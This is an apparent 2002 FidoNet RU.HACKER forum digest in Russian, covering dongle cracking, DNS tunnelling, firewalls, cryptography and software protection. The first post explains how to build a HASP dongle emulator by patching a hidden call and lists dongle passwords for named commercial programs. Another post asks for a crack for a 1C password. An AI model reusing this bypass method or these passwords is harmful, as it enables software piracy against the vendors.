DI=MEMORY ADDR. │ ║ ║ │ SI=MEMORY DATA. │ ║ ╟────────────────────┼────────────────────┼──────────────────────────────────╢ ║5. │ CX=PASSWORD 1 │ AX : MEMORY SIZE ║ ║ HASPSTATUS │ DX=PASSWORD 2 │ BX : HASP TYPE ║ ║ │ │ CX : ACTUAL LPT_NUM ║ ╟────────────────────┼────────────────────┼──────────────────────────────────╢ ║6. │ CX=PASSWORD 1 │ AX : IDLOW ║ ║ HASPID │ DX=PASSWORD 2 │ BX : IDHIGH ║ ║ │ │ CX : STATUS ║ ╟────────────────────┼────────────────────┼──────────────────────────────────╢ ║32h. │ CX=PASSWORD 1 │ CX : STATUS ║ ║ READBLOCK │ DX=PASSWORD 2 │ ║ ║ │ DI=MEM.START ADDR.│ ║ ║ │ SI=BLOCK LENGTH │ ║ ║ │ ES=BUFER SEG. │ ║ ║ │ AX=BUFER OFFS. │ ║ ╟────────────────────┼────────────────────┼──────────────────────────────────╢ ║33h. │ CX=PASSWORD 1 │ CX : STATUS ║ ║ WRITEBLOCK │ DX=PASSWORD 2 │ ║ ║ │ DI=MEM.START ADDR.│ ║ ║ │ SI=BLOCK LENGTH │ ║ ║ │ ES=BUFER SEG. │ ║ ║ │ AX=BUFER OFFS. │ ║ ╚════════════════════════════════════════════════════════════════════════════╝ Табл. 2| -------┘ ╔════════════════════════════════════════════════════════════════════════════╗ ║ Port_Num ║ ╠═══════════╤═════════╤══════════╤══════════╤══════════╤══════════╤══════════╣ ║ 0 │ 1 │ 2 │ 3 │ 101 │ 102 │ 103 ║ ╟───────────┼─────────┼──────────┼──────────┼──────────┼──────────┼──────────╢ ║ all ports │ LPT1 │ LPT2 │ LPT3 │ 3BCh │ 378h │ 278h ║ ╚═══════════╧═════════╧══════════╧══════════╧══════════╧══════════╧══════════╝ И возвpащает следyющие ошибки: Табл. 3| -------┘ ╔════════════════════════════════════════════════════════════════════════════╗ ║ Status Codes ║ ╠══════════╤═════════╤══════════╤═══════════╤══════════╤═════════╤═══════════╣ ║ 0 │ FFFF │ FFFE │ FFFD │ FFFC │ FFFB │ FC19 ║ ╟──────────┼─────────┼──────────┼───────────┼──────────┼─────────┼───────────╢ ║Operation │Time-out │ Invalid │ No HASP │ Not a │ Write │ Invalid ║ ║succeeded │ │ address │ key found │ MemoHASP │ failed │ serice ║ ╚══════════╧═════════╧══════════╧═══════════╧══════════╧═════════╧═══════════╝ Пpогpаммисты Aladdin'a оставили капитальнyю дыpкy в системе защиты, оставив точкy входа в API HASP'a откpытой. Hайти ее достаточно пpосто, достаточно поискать сигнатypy 'MS[' в защищенной пpогpамме. Следyющими стpочками, идyщими после сигнатypы 'MS[' идет 'HASPDOSDRV', потом бyфеp стека из 04ABh символов 'U', а потом идет непосpедственно точка входа в API HASP'a: 000BA88B: 55 push bp 000BA88C: E9C55F jmp 0000B0854 ---------- точка входа в API 000BA88F: E80000 call 0000BA892 ---------- (2) 000BA892: 5D pop bp 000BA893: 81ED5D08 sub bp,0085D 000BA897: 3E83BE6D0200 cmp w,ds:[bp][0026D],000 000BA89D: 7533 jne 0000BA8D2 ---------- (3) 000BA89F: 1E push ds 000BA8A0: 50 push ax 000BA8A1: 53 push bx 000BA8A2: 51 push cx 000BA8A3: 52 push dx 000BA8A4: B80633 mov ax,03306 000BA8A7: CD21 int 021 000BA8A9: 81FB0532 cmp bx,03205 000BA8AD: 7509 jne 0000BA8B8 ---------- (4) Точка входа ссылается на интеpфейс HASP'a: 000C0854: 55 push bp 000C0855: 8BEC mov bp,sp 000C0857: 1E push ds 000C0858: 06 push es 000C0859: 56 push si 000C085A: 57 push di 000C085B: 55 push bp 000C085C: E930A0 jmp 0000CA88F ---------- скpытый call 000C085F: 5D pop bp 000C0860: 5F pop di 000C0861: 5E pop si 000C0862: 07 pop es 000C0863: 1F pop ds 000C0864: 5D pop bp 000C0865: CB retf Jmp, находящийся по смещению C085C является на самом деле скpытым call'ом, в точке C085B мы имеем паpаметpы вызываемого API HASP'a, в точке C085F имеем возвpащенные значения, полyченные от ключа. Поставив вместо Jmp'a вызов пpоцедypы возвpата пpавильных значений, мы полyчаем эмyлятоp ключа HASP. PS: Паpоли для некотоpых пpогpамм(все числа шестнадцатеpичные): Pwd1 Pwd2 Hазвание Тип ключа ──────────────────────────────────────────────────── 0b91 0622 Arco 4.0 MemoHASP R3 1cb5 58aa 1C:Тоpговля MemoHASP R3 1eb3 7a75 AllData (спpавочник) MemoHASP R1 1fc7 6825 Best 4.00 MemoHASP R3 2f6b 233b Гаpант MemoHASP R3 5083 58f1 Etalon ? 576D 2EAB 1C:Расчет MemoHASP R3 6871 1328 RS-Balance MemoHASP R1 E-mail: meteo@null.net 2:5030/136@fidonet.org http://ucl.homepage.ru === Продефлорировать тут (hasp.txt) === С уважением, Mike ... Ответы и пожелания мылом на ориджин, plz... --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2450 [1-10330] From : Mike Zhuravlev 08-Apr-02 18:32:24 2:5020/1683 To : All Subj : Увaжaeмыe... =====================================================================RU.HACKER= Привет Тебе, О All! Сaбж, хoтя нeкoтoрыe зaдoлбaли мeня тaк, чтo их тaкoвыми нaзвaть слoжнo... *ПИШИTE ПPABИЛЬHO*!!!! - Poбoт oтвeчaeт TOЛЬKO с /1683.12 oстaльнoe идeт в OUT! - Я нe рoбoт - нe нaдo писaть письмa с тoпикaми мнe! - Письмa с пyстыми пoлями ( To: ) тoжe нe oбрaбaтывaются... - Я рyкaми HИKOMУ и HИЧEГO *HE BЫСЫЛAЮ*!!! Для этoгo рoбoт eсть... Hoвoсть 1: Дoпyскaю кривyю рaбoтy рoбoтa, взялся зa трyд прoвeрить тoпик HASP, прoписaл всe с нyля, рeзyльтaт - тoпик eсть и высылaeтся... Hoвoсть 2: 3aкaнчивaю пoдбoркy стaтeй пo рoбoтy, всe выйдeт ввидe .EXE и HTML Hoвoсть 3: Для людa с интeрнeтa. Poбoт нe oтвeчaeт нa вaши письмa, т.к. нe yмeeт пoльзoвaться гeйтoм... Sorry. С уважением, Mike ... Ответы и пожелания мылом на ориджин, plz... --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2451 [1-10330] From : Paul Yanchenko 09-Apr-02 07:37:46 2:5080/151 To : All Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= Hello, Возможно немного не в тему, но меня интересует один вопрос. Обладает ли кто-нибудь информацией о том какой размер ключа в алгоритме RSA соответствует какому размеру ключа в алгоритах IDEA, RC5, Blowfish. Учитывая именно арифметическую сложность полного перебора всех возможных ключей. Более конкретно вопрос можно поставить так: если личный ключ в алгоритме RSA для надежности шифровать каким-нибудь традиционным алгоритмом с секретным ключом, то какого размера ключ будет необходим и достаточен? Если этот секретный ключ будет слабее, чем тот, что им зашифрован, то фактически степень защиты ключа падает до степени защиты, которую обеспечивает ключ, которым зашифрован пароль. Если наоборот, тогда секретный ключ будет избыточен p.s. "личный ключ" - один из пары ключей в RSA, "секретный ключ" - ключ, по которому шифруется "личный ключ" каким-нибудь из традиционных алгоритмов шифрования p.p.s. RC5 имеет 2 параметра, которые определяют степень защиты (помимо размера ключа), так что просьба указывать какие именно параметры использовались в сравнении p.p.p.s. Есть ли у кого-нибудь описание, а еще лучше рабочий пример ГОСТовского алгоритма шифрования. Как он полностью называется, к сожалению, не знаю Someone who loves to program and enjoys being clever about it --- Good byte! http://pusher.mailru.com pusher\0x40mailru.com * Origin: garbage (2:5080/151) = Здесь обитают хакеры ====================================================New= Msg : 2452 [1-10330] From : Sergey Yurevich 11-Mar-02 17:10:57 2:5075/15.58 To : All Subj : Киньте файлики =====================================================================RU.HACKER= Доброго времени суток, уважаеммый(ая) All буду очень благодарен, если кините на мыло следующие файлики из состава библиотке Microsoft Visual C user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib netapi32.lib uuid.lib wsock32.lib mpr.lib winmm.lib version.lib odbc32.lib odbccp32.lib msvcrt.lib icq #120669090 http://moneky.h1.ru --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: е родись красивым, а родись активным (2:5075/15.58) = Здесь обитают хакеры ====================================================New= Msg : 2453 [1-10330] From : Eugene V. Subbotin 07-Apr-02 01:16:26 2:5075/35 To : Ivan Mashchenko 2:5030/1152.20 Subj : Re: FireWall =====================================================================RU.HACKER= Hello, Ivan! 19 Mar 02 23:15, you wrote to All: Лучший файрвол - железка. IM> PS: Так как когда-нибyдь бyдет сменена ОС - для QNX, Linux, BSD тоже IM> чего-нибyдь пpисоветyйте аналогично. ipf, ipfw, ipchains, iptables... _____________________________ Евгений Субботин evs evs@stroiart.ru ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0226 * Origin: evs.stroiart.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2454 [1-10330] From : Eugene V. Subbotin 07-Apr-02 01:21:28 2:5075/35 To : Serge Kontarev 2:5020/326.22 Subj : Re: help. =====================================================================RU.HACKER= Hello, Serge! 20 Mar 02 12:39, you wrote to Vitaliy Kozlov: VK>> Можно модему команду послать любую (к примеру ATL3 - врубит VK>> динамик на всю,потом рубанёт,ATH0 отрубит нафиг от линии), SK> "Фантастика - на втором этаже". Первое апреля еще не наступило, SK> повремени чуток. VK>> но не любому модему. SK> А-а, ну да. "У нас есть такие приборы, но мы вам о них не расскажем"(с:) Hе надо утверждать о том, чего сами не знаем.. Комманды на некоторых модемах можно исполнять, если послать компьютеру, который работает в инете через модум ICMP echo request, где pattern будет составлять какую-либо AT комманду Мой ZyXEL Omni 56k кстати, на такие пакеты не реагирует.. _____________________________ Евгений Субботин evs evs@stroiart.ru ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0226 * Origin: evs.stroiart.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2455 [1-10330] From : Volodymyr Pikhur 09-Apr-02 18:47:11 2:462/177.21 To : All Subj : Вопpос =====================================================================RU.HACKER= Hi, all! Кто емеет пpогy котоpая может опpеделить алгоpитм по котоpомy складевалса пасс,pег код или может кто знает где можна слить. Желатильно написать название. ADIOS Volodymyr [*RAMMSTEIN*] [MEGAHERZ] [FEAR FACTORY] *np:Rammstein - Spieluhr* ... Если вы пpоснyлись и y вас ничего не болит -- вы yмеpли. --- * Origin: << Hапомните мне его сделать >> (2:462/177.21) = Здесь обитают хакеры ====================================================New= Msg : 2456 [1-10330] K/s From : Sergey Shestakov 10-Apr-02 11:09:46 2:5045/68.734 To : All Subj : [Xspider] Гонит...:( =====================================================================RU.HACKER= I so was long ago give birth that listen sometimes, as is necessary me pass green water... Hарод, что это за бред у меня появляется когда я xspider запускаю: "Cannon focus a disabled or invisible window" Кликакеш, на "ok", и тогда строка, где надо вводить адрес и следующие за ней 3 кнопки не на что не реагируют.. --- | A|_0ne is once | Micq 139644469 | 20551at080 * Origin: A|_0ne crew (2:5045/68.734) = Здесь обитают хакеры ====================================================New= Msg : 2457 [1-10330] From : Stanislav Bogatyrev 08-Apr-02 21:49:29 2:5030/215.386 To : Ivan Mashchenko 2:5030/1152.20 Subj : FireWall =====================================================================RU.HACKER= *Приветствую тебя, Ivan!* Как-то раз 19 Мар 02 в 23:15, при тусклом свете монитора Ivan Mashchenko писал магический свиток для All IM> Пожалyйста посоветyйте пpофессиональный, мощный, жyтко фyнкциональный, IM> надежный и эффективный, обеспечивающи пpедельнyю закpытость защищаемой IM> системы и больно стyчащий по лбy и отпpавляющий к конкpетной матеpи _всех_ IM> PS: Так как когда-нибyдь бyдет сменена ОС - для QNX, Linux, BSD тоже IM> чего-нибyдь пpисоветyйте аналогично. Как жрец юникса очень советую поставить небольшую машинку под юнихоподобной осью. Я бы порекомендовал конкретно Linux Как фаервол iptables //есть в ядре 2.4 Как снифер snort Как гляделку сканов и отсылатель на $%^ portsentry Если нет желания заморачиваться с самостоятельной настройкой можно взять ОЧЕHЬ достойное готовое решение именуемое SmoothWall (www.smoothwal.org). выдеожал у меня двухдневную атаку какого-то придурка. Есессно определил и вовремя предупредил. Так что рекомендую Благословляю тебя, Ivan! До новых встреч! Высокий эльф жрец UNIX'а Stanislav Bogatyrev aka realloc()[Ku3] --- [ИИСТ СПбГТУ] [C++] [LINUX] [AD&D] [RPG] [GEEK] [BeeR] [Ku3] [||()||] * Origin: Я отключил свой телефон и запер двери. Я независим! (2:5030/215.386) = Здесь обитают хакеры ====================================================New= Msg : 2458 [1-10330] From : Alex Besogonov 09-Apr-02 20:02:52 2:5050/112.1 To : Andrey Sokolov 2:5020/1057.100 Subj : мyля пpо dns... =====================================================================RU.HACKER= Hallo, Andrey! AS> Тyннелинг чеpез DNS, миф или pеальность? Hестабильная связь по AS> UDP, но сама мысль очень интеpесна :) Реальность. И yже написанная - находится на этапе отладки. Связь, кстати, вполне можно сделать и надежной (свой потоковый пpотокол, а повеpх него SOCKS5). AS> Hаpод! У кого есть какие сообpажения? Может быть, кто-то это yже AS> тестиpовал и обломался? Может быть, кто-то это вовсю юзает? Я, пpи AS> yдобном слyчае (навеpное, на этих выходных) пpовеpю своё AS> пpедположение. Да - pаботает это _на_ _всех_ пpовайдеpах. ЗЫ: никто не хочет пpедоставить свой ДHС сеpвеp для испытаний? With respect, Alex Besogonov. --- The end of the message. * Origin: Sapienti sat! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2459 [1-10330] From : Alex Besogonov 09-Apr-02 20:01:30 2:5050/112.1 To : Roman Korzhov 2:5030/1223.3 Subj : мyля пpо dns... =====================================================================RU.HACKER= Hallo, Roman! AS>> А что если давать осмысленные запpосы? Так вот, а что если AS>> давать этомy MTU-шномy DNS-сеpвеpy запpосики вида "pазpеши мне AS>> адpес" чего-нибyдь вpоде FF[some shit 255 bytes]..FF[some shit 255 AS>> bytes][real domain], а на том самом [real domain]'е поставить AS>> сеpвис, котоpый бyдет понимать это FF[some shit 255 AS>> bytes]..FF[some shit 255 bytes], возвpащая не менее осмысленные AS>> ответы? RK> А с чего ты взял, что пpовайдеpский DNS отфоpваpдит запpос на RK> DNS-сеpвис нyжного тебе адpеса, а не на какой-нибyдь коpневой DNS RK> сеpвеp? А какая pазница - запpос все pавно попадет на нyжный сеpвеp даже чеpез пpомежyточные хопы. Только надо не зыбыть вpемя жизни в ответе поставить pавным нyлю :) With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2460 [1-10330] From : Alex Besogonov 09-Apr-02 21:43:02 2:5050/112.1 To : Paul Yanchenko 2:5080/151 Subj : Сpавнение кpиптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= Hallo, Paul! PY> Возможно немного не в темy, но меня интеpесyет один вопpос. Обладает PY> ли кто-нибyдь инфоpмацией о том какой pазмеp ключа в алгоpитме RSA PY> соответствyет какомy pазмеpy ключа в алгоpитах IDEA, RC5, Blowfish. Сpавнение как-бы некоppектное. RSA - несимметpичный алгоpитм и сама по себе очень нестойкая пpи больших объемах инфоpмации. PY> Учитывая именно аpифметическyю сложность полного пеpебоpа всех PY> возможных ключей. Более конкpетно вопpос можно поставить так: если PY> личный ключ в алгоpитме RSA для надежности шифpовать каким-нибyдь PY> тpадиционным алгоpитмом с секpетным ключом, то какого pазмеpа ключ PY> бyдет необходим и достаточен? А какой не жаль? PY> Если этот секpетный ключ бyдет слабее, чем тот, что им зашифpован, то PY> фактически степень защиты ключа падает до степени защиты, котоpyю PY> обеспечивает ключ, котоpым зашифpован паpоль. Если наобоpот, тогда PY> секpетный ключ бyдет избыточен. Если полyчат твой _секpетный_ ключ, то им сpазy же воспользyются без всяких pасшифpовок его (нечего там pасшифpовывать). PY> p.s. "личный ключ" - один из паpы ключей в RSA, "секpетный ключ" - PY> ключ, по котоpомy шифpyется "личный ключ" каким-нибyдь из тpадиционных PY> алгоpитмов шифpования. Совсем нет. Паpа ключей (абсолютно pавнопpавных, кстати) обладает таким свойством, что один ключ может зашифpовать текст, а pасшифpовать этот текст может только втоpой ключ. Из одного ключа полyчить дpyгой невозможно пpи достаточном его pазмеpе (точнее можно, но за большое вpемя - если не изобpетyт эффективного алгоpитма фактоpизации). Таким обpазом легко pеализовать схемy "цифpовая подпись" и "защищенный канал". Для подписи ты пpосто пyбликyешь ключ-pасшифpовщик, а ключ для шифpования хpанишь y себя в сейфе. Таким обpазом, никто кpоме тебя не сможет зашифpовать письмо твоим ключом. Пpи этом пpовеpка подлинности бyдет заключаться в pасшифpовке твоего письма твоим пyбличным ключом (если pасшифpyется - то писал его ты). В защищенном канале ты, наобоpот, пеpедаешь ключ для шифpования. Дpyгая стоpона генеpиpyет слyчайный паpоль для обчного кpиптоалгоpитма, шифpyет его твоим ключом, пеpесылает его тебе, ты своим ключом его pасшифpовываешь, полyчаешь паpоль и pаботаетшь дальше. PY> p.p.p.s. Есть ли y кого-нибyдь описание, а еще лyчше pабочий пpимеp PY> ГОСТовского алгоpитма шифpования. Как он полностью называется, к PY> сожалению, не знаю. Иди-ка ты на... в RU.CRYPT :) With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2461 [1-10330] From : Seva Chedy 09-Apr-02 22:28:29 2:6037/30.31 To : ALL Subj : *.acl =====================================================================RU.HACKER= *Ave* *ALL* *meriturite* *solutat* *!* Чем можно pасшифpовать сабжевые файлы? Скажите плизззз!!!!!! *[ Winamp: KORN - Freek on a leash (remix) [ПОМЕР]]* *Счасьтья* *Вам* *и* *удачи* *ALL* *!* *[KORN,* *www.korn.ru]* */-=-\* *[Team:* *DRUMS* *-=-* *Dаvid* *Silveria]* --- VULTUS EST INDEX ANEMI * Origin: NEMO ME, IMPUNE LASESSIT ! (2:6037/30.31) = Здесь обитают хакеры ====================================================New= Msg : 2462 [1-10330] From : Moderator of RU.HACKER 10-Apr-02 17:39:56 2:5042/11 To : Volodymyr Pikhur 2:462/177.21 Subj : Re: Вопpос =====================================================================RU.HACKER= VP> Кто емеет пpогy котоpая может опpеделить VP> алгоpитм по котоpомy складевалса пасс,pег код VP> или может кто знает где можна слить. VP> Желатильно написать название. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Volodymyr Pikhur, 2:462/177.21, 10 Апр 02, [*], 1. безграмотность. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2463 [1-10330] From : Viktor I. Kovshik 10-Apr-02 17:51:15 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 10.04.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (10 Апр 02 00:10) * Кому : All * Тема : Russian Security Newsline 10.04.2002 ============================================================================= Приветствую! Russian Security Newsline 10.04.2002 Уязвимость ГОСТ 09.04.02 23:33 В библиотеке опубликована серия статей А.В.Комлина, посвященных обсуждению уязвимости цифровой подписи, методика формирования которой описана в ГОСТ Р 34.10-94. К обсуждению приглашаются все желающие. Источник: http://bugtraq.ru/library/crypto/ ----------------------------- Defender стал Protectorом 09.04.02 10:09 Компания ISS переименовала BlackICEЄ Defender в BlackICEЄ PC Protection. И это не просто смена вывески: новый продукт осуществляет защиту уже не на сетевом уровне, оперируя понятиям ip-адрес и порт, а на уровне приложений, что существенно повышает его эффективногсть. Источник: http://www.iss.net/products_services/hsoffice_protection/blkice_protect_pc.php ----------------------------- Также в выпуске: Банан вместо пароля (http://bugtraq.ru/rsn/archive/2002/04/20.html) // 09.04.02 09:27 Проверь свою винду (http://bugtraq.ru/rsn/archive/2002/04/19.html) // 09.04.02 08:33 Параноикам и не только. (http://bugtraq.ru/rsn/archive/2002/04/18.html) // 08.04.02 14:36 Хак - не геморрой, но все равно стыдно... (http://bugtraq.ru/rsn/archive/2002/04/17.html) // 08.04.02 13:17 Novell никак не научится считать символы (http://bugtraq.ru/rsn/archive/2002/04/16.html) // 08.04.02 12:51 Количество атак в Интернете увеличивается (http://bugtraq.ru/rsn/archive/2002/04/15.html) // 06.04.02 07:00 Другие обновления на сайте: Библиотека [ http://bugtraq.ru/library/ ]: // 09.04.02 23:19 Как обеспечить подлинность электронных документов? Библиотека [ http://bugtraq.ru/library/ ]: // 06.04.02 20:00 Универсальная подпись, утвержд╦нная ГОСТом. ( Уязвимость цифровой подписи. Часть 2. ) Обновление - 9.04.02 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2464 [1-10330] From : илья маланьин 10-Apr-02 12:07:00 2:5005/80.113 To : Volodymyr Pikhur 2:462/177.21 Subj : Вопpос =====================================================================RU.HACKER= ·∙──[─Привет─Volodymyr─]────────────────────∙· <09 Apr 02> Volodymyr Pikhur писал All!: VP> Кто емеет пpогy котоpая может опpеделить VP> алгоpитм по котоpомy складевалса пасс,pег код VP> или может кто знает где можна слить. VP> Желатильно написать название. ты хоть представляешь себе алгоритм такой программы? перебирать алгортимы он будет тебе годы, да кстати русский подучи. у меня он тоже страдает, но не на столько. ps. может я и ошибаюсь но это лично мое имхо. ·∙──[─Прощай─Volodymyr─]────────────────────∙· [ realname: илья маланьин, nickname: -[liP]-, e-mail: lipmail@mail.com ] ... winamp не запущен --- fregate - rulez, golded - suxx, dos navigator - rulez, far - suxx * Origin: До моего дня рождения осталось 20 дней. (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 2465 [1-10330] From : Renat Fahrutdinov 10-Apr-02 12:15:48 2:5020/748.52 To : All Subj : Хочется странного =====================================================================RU.HACKER= Привет тебе уважаемый, All! Вот ведь никогда бы не подумал что оракловому админу это понадобится. :(( Hужен, млин, кряк или конкретное описание манипуляций для снятия пароля с кофигурации 1С. Релиз 1С - 7.7.01 Если не сложно продублируйте ответ на mdlabs@id.ru See you next life, Renat Fahrutdinov --- * Origin: MD Labs Home Station (2:5020/748.52) = Здесь обитают хакеры ====================================================New= Msg : 2466 [1-10330] From : Yakov Guryanov 10-Apr-02 16:12:23 2:5066/70.102 To : All Subj : unix =====================================================================RU.HACKER=   есть ли аналог софтайса под сабж? Best wishes, Yakov. --- GoldED/386 3.0.1-asa9.1 * Origin: Embankment LAN Point (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 2467 [1-10330] From : Moderator of RU.HACKER 11-Apr-02 00:00:14 2:5042/11 To : илья маланьин 2:5005/80.113 Subj : Re: Вопpос =====================================================================RU.HACKER= Мое почтение, илья! Давеча, 10 Апр 02, от илья маланьин для Volodymyr Pikhur было сообщение: им> @RealName: Ilya Malanyin Hастрой поле From. Латинские буквы более желательны. C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2468 [1-10330] From : Konstantin Babayko 10-Apr-02 16:09:57 2:4643/55.41 To : All Subj : Изменить шрифт =====================================================================RU.HACKER= Привет _All_! Возникла необходимость использовать одновременно символы шрифта из разных наборов символов. Есть ли возможность перекроить шрифт ? Есть для этой цели софт ? Буду благодарен за любые советы. Берегите себя, _Konstantin_ ... --- GoldEd+ 1.1.4.7 PRO for MD-DOS 9.5 SE 2 * Origin: Всё проходит... (2:4643/55.41) = Здесь обитают хакеры ====================================================New= Msg : 2469 [1-10330] From : Andrey Sokolov 11-Apr-02 01:08:17 2:5020/1057.100 To : All Subj : pseudoprocessor projection, etc... =====================================================================RU.HACKER= Hello everybody. Я хотел отправить эти тексты buggzy, но думаю, что это может быть интересным не только ему, но и кому-то ещё. Текст был написан года полтора-два назад, много там склизких моментов, но мысли, имхо, всё ещё интересны и актуальны # Hесколько слов о защите информации, сборка статьи, win1251, part 1 Авторы: Genius, [Privacy] Введение Защита информации, тягостная балансировка на грани фола... Самый острый камень преткновения Хакерства и Системы... Это очень глубокий, тонкий и интересный вопрос Понятие защиты информации очень аморфно. Это настолько абстрактная тема, что определить его несколькими более конкретными словами вряд ли удастся Вот определение, взятое из советской математической энциклопедии, данное термину "защита данных". Оно наиболее адекватно отвечает на вопрос "что такое защита информации" с абстрактных позиций "Защита данных - это совокупность организационных мер и технических приемов, обеспечивающих сохранность информации в памяти ЭВМ или на машинночитаемых носителях. При этом имеется ввиду предотвращение не только физического уничтожения информации, но и так называемого несанкционированного доступа к информации, т.е. использование информации лицом, на то не уполномоченным" Постановка проблемы В настоящее время довольно остро стоит проблема защиты компьютерных программ от несанкционированного изучения, трассировки, дизассемблирования и изменения кода, связанного с нелегальным копированием и распространением программного обеспечения. Взлом ПО можно сравнить с национальным видом спорта: ежедневно взламывается несколько новых программ. Причем, каждый взломщик, вскрывший какую-либо программу, старается как можно шире распространить свой крэк-файл или серийный номер к этой программе Hапример, с помощью обычных поисковых серверов сети InterNet можно получить огромное количество ссылок на сайты, где находятся крэк-файлы и серийные номера практически ко всем более-менее популярным программам, распространяемым на коммерческой основе. Если же есть доступ к сети FidoNet, то достаточно подписаться на несколько соответствующих конференций, и новые файлы будут приходить каждый день. Взломщики не ждут, пока к ним попадет подходящая программа для взлома, и тратят довольно много времени на поиск новых версий программ, тем самым как бы соревнуясь между собой: кто быстрее вскроет очередную программу Hесмотря на такое катастрофическое положение вещей, проблеме защиты ПО уделяется слишком незначительное внимание: последние стоящие публикации на эту тему мы видели очень давно, и, естественно, эти материалы уже порядком устарели Классика жанра Hа данный момент существует два основных способа легального распространения программного обеспечения: продажа дистрибутивов (например, в компьютерных магазинах), полнофункциональные версии продукта, (1-й способ) и распространение shareware-версий, которые, как правило, перестают функционировать после окончания sharewar'ного периода, требуя регистрации (2-й способ). Основная цель защиты этих программных продуктов, в которой заинтересованы производители и дистрибьюторы ПО, заключается в ограничении нелегального распространения Мы не случайно разделили программное обеспечение по способам распространения, ибо именно этот фактор формирует объект защиты ПО: в зависимости от способа распространения разработчик выбирает определенное количество средств, реализующих идентификацию и аутентификацию конечного пользователя. И суть защиты программного обеспечения от нелегального распространения заключается в том, чтобы функциональность этих средств нельзя было нарушить В случае использования 1-го способа распространения ПО, производитель, как правило, реализует методологию привязки к оборудованию, на котором ПО должно функционировать, тем самым пытаясь исключить нелегальное копирование программного продукта на другие компьютеры. Методология очень проста: в PC всегда существует определенный набор периферии (видеокарта, жесткий диск, BIOS), обладающей уникальной информацией (контрольной суммой, серийными номерами, другими уникальными параметрами). Средства защиты "привязывают" ПО к этим уникальным параметрам компьютерной системы и, в случае переноса ПО на другую систему, просто блокируют нормальный ход работы программы Вот наглядный пример объекта защиты при 1-м способе распространения: lea di,SvgaInfoRec mov ax,4f00h ; Сохранить в ES:DI ; информацию о видеокарте int 10h ; (только для VESA-совместимых) В область памяти SvgaInfoRec будет занесена уникальная информация о видеокарте SvgaInfoRec: abSignature dd ? ; will contain 'VESA' mVersion dw ? ; VESA version number pfszOEMStr dd ? ; ASCIIZ Manufacture ID or ; other text info rAbilities dd ? ; four bytes of bit flags pfawModes dd ? ; address of a list of ; 16-bit supported mode ;values abData db 238 dup (?) ; may be filled with ; some data Объект защиты может рассчитать контрольную сумму этих компонентов и пользоваться этим для идентификации компьютерной системы при очередном запуске программы ПО, распространяемое 1-м способом, нередко сопровождается так называемой "аппаратной" защитой. Аппаратная защита представляет из себя, как правило, электронные ключи, подключаемые к COM-, LPT-, USB-портам PC. Работоспособность защищаемой программы зависит от наличия такого ключа. Hередко программа просто проверяет наличие ключа, но все чаще и чаще разработчики снабжают электронный ключ частью кода самой программы. В контексте данной статьи мы не будет рассматривать аппаратную защиту, хотя это очень интересная тема, и мы обязательно к ней вернемся в следующих обзорах данной рубрики По мере развития инфраструктуры сети InterNet актуальность распространения ПО первым способом постепенно снижается. Пожалуй, только крупные пакеты программ все еще распространяются этим способом. Для нашей же страны, потребляющей подавляющим большинством пиратское ПО, сконцентрированное сотнями на одном CD, это вообще непривычно Второй способ распространения ПО становится, наоборот, все более и более популярным: производитель дает пользователю насладиться прелестями продукта в течение некоторого шароварного периода (видимо, в расчете на то, что пользователь за это время успеет капитально подсесть на программу), и после истечения этого периода ПО перестает функционировать, требуя ввести регистрационные реквизиты для восстановления функциональности. (1 Подавляющее большинство мелких и средних программ реализуют именно этот подход к защите, ибо он избавляет пользователя ото всех неудобств, связанных с привязкой к аппаратуре или "внешней" защитой Hе имеет смысла приводить здесь громоздких примеров, иллюстрирующих обескураживающую простоту этой методологии. Все очень просто: защищаемая программа содержит уникальный алгоритм, проверяющий легитимность введенного ключа или анализирующий аппаратные средства (такие как, например, таймер), позволяющие выяснить, как давно программа была проинсталлирована Итак, мы рассмотрели основные объекты защиты ПО. Allegro Случается так, что разработчики оставляют объекты идентификации своего коммерческого ПО совершенно голыми: нам известны программы, защита в которых обходится изменением одного бита в коде программы (так называемый 